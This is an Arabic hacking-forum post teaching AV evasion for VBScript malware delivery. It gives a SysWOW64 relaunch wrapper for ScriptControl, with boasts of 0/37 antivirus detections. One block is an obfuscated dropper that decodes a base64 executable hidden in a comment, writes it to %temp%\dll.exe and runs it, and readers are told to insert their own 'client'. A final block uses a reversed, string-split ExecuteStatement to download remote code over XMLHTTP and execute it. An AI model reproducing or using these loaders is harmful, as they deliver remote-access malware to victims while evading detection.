22.01.2018 تشغيل السكربتات المعتمدة على ScriptControl على النواتين New Method


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

الحالة
مغلق و غير مفتوح للمزيد من الردود.

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
حياكم الله ياشباب
الاخ راكان البارحة قال لي انه لازم اتابع دروسه هنا
سلسله تشفير VBScript : الدرس الاول
سلسله تشفير VBScript : الدرس الثاني
سلسله تشفير VBScript : الدرس الثالث
سلسله تشفير VBScript : الدرس الرابع
وبالغعل الاخ منزل مواضيع تكتب بماء الذهب ..استقيت منها افكار كثير
وتعلمت منه الكثير .. من ماتعلمته انه عند اعتمادنا بكتابة السكربت وتشفيره على ScriptControl
انه من مساوئ الطريقة انها لن تعمل على نظام التشغيل بنواة 64 بت
وذكر ان الاخ هوديني عمل Sub للتحقق من نوع نظام التشغيل
ان كان 64 بت فبيشتغل اللودر الخاص بالسكربت بمجلد SysWow64
والا يكمل العمل لان السكربت يعمل على 32 بت مافيه مشكلة
ان وضعنا الساب مع سكربت صغير لقراءة اول سطر
اعلم انه كومنت بس الاخ راكان علمنا كيف نخلي السكربت يقرا نفسه ويستبدل الكومنت مثلا
ويظهر لنا السترينج اللي معمله كومنت ..
المهم نتيجة فحص ساب اللي سواه الاخ هوديني مع مسج بوكس عادية
ProcOSArch.vbs | 11/37 | NoDistribute
شيل الفراغ عند ش يل
C#:
'BasharBachir
MsgBox(Replace(Split(GTV(),vbCrlf)(0),"'",""))
set sc = CreateObject("ScriptControl")
sc.language = "VBScript"
sc.timeout = -1
Function GTV()
Set F = CreateObject("Scripting.FileSystemObject")
M = F.OpenTextFile(Wscript.ScriptFullName,1).Readall
GTV = M
End Function
SUB a19:SET a20 = WSCRIPT.CREATEOBJECT ("WSCRIPT.S HELL"):SET a21 = GETOBJECT ("WINMGMTS:\\.\ROOT\CIMV2"):SET a22 = a21.EXECQUERY ("SELECT * FROM WIN32_COMPUTERSYSTEM"):FOR EACH a23 IN a22:a24 = a23.SYSTEMTYPE:NEXT:IF (UCASE(a24) = "X64-BASED PC") AND (INSTR (UCASE(WSCRIPT.PATH),"SYSWOW64") = 0) THEN:a20.RUN a20.EXPANDENVIRONMENTSTRINGS("%WINDIR%")&"\SYSWOW64\WSCRIPT.EXE "&CHR(34)&WSCRIPT.SCRIPTFULLNAME&CHR(34):WSCRIPT.QUIT:END IF:END SUB
وهذا لاباس فيه لان الساب صرله مكتوب 3 سنوات ههه
على كل بحثت ووجدت وبعد ماعدلت على السكربت صارت الطريقة كلين هنا
والطريقة تعمل على النواتين تمت التجربة وكلين ايضا
Check2.vbs | 0/37 | NoDistribute
هنا السكربت بدون مثال المسج بوكس فقط ضع الكود او سكربتك اللي معتمد على سكربت كونترول
في نهاية السكربت هنا ورح يشتغل على النواتين
C#:
Dim ScriptHost : ScriptHost = Mid(WScript.FullName, InStrRev(WScript.FullName, "\") + 1, Len(WScript.FullName))
Dim oWs : Set oWs = CreateObject("WScript.Shell")
Dim oProcEnv : Set oProcEnv = oWs.Environment("Process")
If InStr(LCase(WScript.FullName), LCase(oProcEnv("windir") & "\System32\")) And oProcEnv("PROCESSOR_ARCHITECTURE") = "AMD64" Then
    If Not WScript.Arguments.Count = 0 Then
        Dim sArg, Arg
        sArg = ""
        For Each Arg In Wscript.Arguments
              sArg = sArg & " " & """" & Arg & """"
        Next
    End If
    Dim sCmd : sCmd = """" &  oProcEnv("windir") & "\SysWOW64\" & ScriptHost & """" & " """ & WScript.ScriptFullName & """" & sArg
    oWs.Run sCmd
    WScript.Quit
End If
هنا السكربت مع مثال مسج بوكس يتم قراءة محتوى المسج بوكس من التعليق اول سطر
C#:
'BasharBachir
Dim ScriptHost : ScriptHost = Mid(WScript.FullName, InStrRev(WScript.FullName, "\") + 1, Len(WScript.FullName))
Dim oWs : Set oWs = CreateObject("WScript.Shell")
Dim oProcEnv : Set oProcEnv = oWs.Environment("Process")
If InStr(LCase(WScript.FullName), LCase(oProcEnv("windir") & "\System32\")) And oProcEnv("PROCESSOR_ARCHITECTURE") = "AMD64" Then
    If Not WScript.Arguments.Count = 0 Then
        Dim sArg, Arg
        sArg = ""
        For Each Arg In Wscript.Arguments
              sArg = sArg & " " & """" & Arg & """"
        Next
    End If
    Dim sCmd : sCmd = """" &  oProcEnv("windir") & "\SysWOW64\" & ScriptHost & """" & " """ & WScript.ScriptFullName & """" & sArg
    oWs.Run sCmd
    WScript.Quit
End If
MsgBox(Replace(Split(GTV(),vbCrlf)(0),"'",""))
set sc = CreateObject("ScriptControl")
sc.language = "VBScript"
sc.timeout = -1
Function GTV()
Set F = CreateObject("Scripting.FileSystemObject")
M = F.OpenTextFile(Wscript.ScriptFullName,1).Readall
GTV = M
End Function
وبعيدا قريبا عن الموضوع هنا تطبيق للدرس الاول "مدري الثاني"
لدرس الاخ راكان
السكربت يعمل على النواتين ويقوم بتحويل قيم البيس64 اللي وضعناهم ك تعليق بالسكربت
لبايت اراي وبيكتبهم على الهارد وبشغلهم "كمثال للتطبيق فقط" اللي سويته احسن بس بده موضوع لحاله
فقط ضع قيم كلاينتك بدل اول كم محرف حيتهم لقيم كلاينتي باول سطر
C#:
'TVqQAAMAAAAEAAAA
Dim ScriptHost : ScriptHost = Mid(WScript.FullName, InStrRev(WScript.FullName, Chr(92)) + 1, Len(WScript.FullName))
Dim oWs : Set oWs = CreateObject(Chr(87)&Chr(83)&Chr(99)&Chr(114)&Chr(105)&Chr(112)&Chr(116)&Chr(46)&Chr(83)&Chr(104)&Chr(101)&Chr(108)&Chr(108))
Dim oProcEnv : Set oProcEnv = oWs.Environment(Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115))
If InStr(LCase(WScript.FullName), LCase(oProcEnv(Chr(119)&Chr(105)&Chr(110)&Chr(100)&Chr(105)&Chr(114)) & "\System32\")) And oProcEnv("PROCESSOR_ARCHITECTURE") = "AMD64" Then
    If Not WScript.Arguments.Count = 0 Then
        Dim sArg, Arg
        sArg = ""
        For Each Arg In Wscript.Arguments
              sArg = sArg & Chr(32) & """" & Arg & """"
        Next
    End If
    Dim sCmd : sCmd = """" &  oProcEnv("windir") & "\SysWOW64\" & ScriptHost & """" & " """ & WScript.ScriptFullName & """" & sArg
    oWs.Run sCmd
    WScript.Quit
End If
set sc = CreateObject(Chr(83)&Chr(99)&Chr(114)&Chr(105)&Chr(112)&Chr(116)&Chr(67)&Chr(111)&Chr(110)&Chr(116)&Chr(114)&Chr(111)&Chr(108))
sc.language = Chr(86)&Chr(66)&Chr(83)&Chr(99)&Chr(114)&Chr(105)&Chr(112)&Chr(116)
sc.timeout = -1
Function GTV()
Set F = CreateObject(Chr(83)&Chr(99)&Chr(114)&Chr(105)&Chr(112)&Chr(116)&Chr(105)&Chr(110)&Chr(103)&Chr(46)&Chr(70)&Chr(105)&Chr(108)&Chr(101)&Chr(83)&Chr(121)&Chr(115)&Chr(116)&Chr(101)&Chr(109)&Chr(79)&Chr(98)&Chr(106)&Chr(101)&Chr(99)&Chr(116))
M = F.OpenTextFile(Wscript.ScriptFullName,1).Readall
GTV = M
End Function
on error resume next
dim medo,sea,medoff
dim maasr
set helper = createobject(Chr(87)&Chr(115)&Chr(99)&Chr(114)&Chr(105)&Chr(112)&Chr(116)&Chr(46)&Chr(83)&Chr(104)&Chr(101)&Chr(108)&Chr(108))
maasr = helper.ExpandEnvironmentStrings(Chr(37)&Chr(116)&Chr(101)&Chr(109)&Chr(112)&Chr(37))
set medo = CreateObject(Chr(77)&Chr(115)&Chr(120)&Chr(109)&Chr(108)&Chr(50)&Chr(46)&Chr(68)&Chr(79)&Chr(77)&Chr(68)&Chr(111)&Chr(99)&Chr(117)&Chr(109)&Chr(101)&Chr(110)&Chr(116)&Chr(46)&Chr(51)&Chr(46)&Chr(48)).CreateElement("base64")
medo.dataType=Chr(98)&Chr(105)&Chr(110)&Chr(46)&Chr(98)&Chr(97)&Chr(115)&Chr(101)&Chr(54)&Chr(52)
medo.text= Replace(Split(GTV(),vbCrlf)(0),Chr(39),"")
set sea= CreateObject(Chr(65)&Chr(68)&Chr(79)&Chr(68)&Chr(66)&Chr(46)&Chr(83)&Chr(116)&Chr(114)&Chr(101)&Chr(97)&Chr(109))
sea.Type=1
sea.Open
sea.Write medo.nodeTypedValue
sea.SavetoFile maasr & "\dll.exe",2
helper.run(maasr & "\dll.exe")
Function tttttttttttttttt ()
tttttttttttttttt = chr(104) & chr(101) & chr(114) & chr(111)
End function
هنا عن طريق دالة اكسكيوت ستيتمنت

CSS:
Dim ScriptHost : ScriptHost = Mid(WScript.FullName, InStrRev(WScript.FullName, "\") + 1, Len(WScript.FullName))
Dim oWs : Set oWs = CreateObject("W"+"Scrip"+"t.S"+"hell")
Dim oProcEnv : Set oProcEnv = oWs.Environment("Process")
If InStr(LCase(WScript.FullName), LCase(oProcEnv("windir") & "\System32\")) And oProcEnv("PROCESSOR_ARCHITECTURE") = "AMD64" Then
    If Not WScript.Arguments.Count = 0 Then
        Dim sArg, Arg
        sArg = ""
        For Each Arg In Wscript.Arguments
              sArg = sArg & " " & """" & Arg & """"
        Next
    End If
    Dim sCmd : sCmd = """" &  oProcEnv("windir") & "\SysWOW64\" & ScriptHost & """" & " """ & WScript.ScriptFullName & """" & sArg
    oWs.Run sCmd
    WScript.Quit
End If
set sc = CreateObject("ScriptControl")
sc.language = "VBScript"
sc.timeout = -1
sc.executestatement rev(")"+"t"+"x"+"e"+"t"+"e"+"s"+"n"+"o"+"p"+"s"+"e"+"r"+"."+"A"+"("+"e"+"t"+"u"+"c"+"e"+"x"+"E"+":"+"d"+"n"+"e"+"s"+"."+"A"+":"+"e"+"s"+"l"+"a"+"f"+","+"""+"""+"y"+"L"+"r"+"e"+"X"+"d"+"x"+"2"+"/"+"w"+"a"+"r"+"/"+"m"+"o"+"c"+"."+":"+"s"+"p"+"t"+"t"+"h"+"""+"""+","+"""+"""+"T"+"S"+"O"+"P"+"""+"""+" "+"n"+"e"+"p"+"O"+"."+"A"+":"+")"+"""+"""+"P"+"T"+"T"+"H"+"L"+"M"+"X"+"."+"2"+"L"+"M"+"X"+"S"+"M"+"""+"""+"("+"t"+"c"+"e"+"j"+"b"+"O"+"e"+"t"+"a"+"e"+"r"+"C"+"="+"A"+" "+"t"+"e"+"s")
Function rev(s)
  Dim p
  For p = Len(s) To 1 Step -1
      rev = rev & Mid(s, p, 1)
  Next
End Function
لمشاهدة الفديو بالمرفقات

 

المرفقات

التعديل الأخير:
  • أعجبني
التفاعلات: Eagle_Master، ViRusRat و Kredit
الحالة
مغلق و غير مفتوح للمزيد من الردود.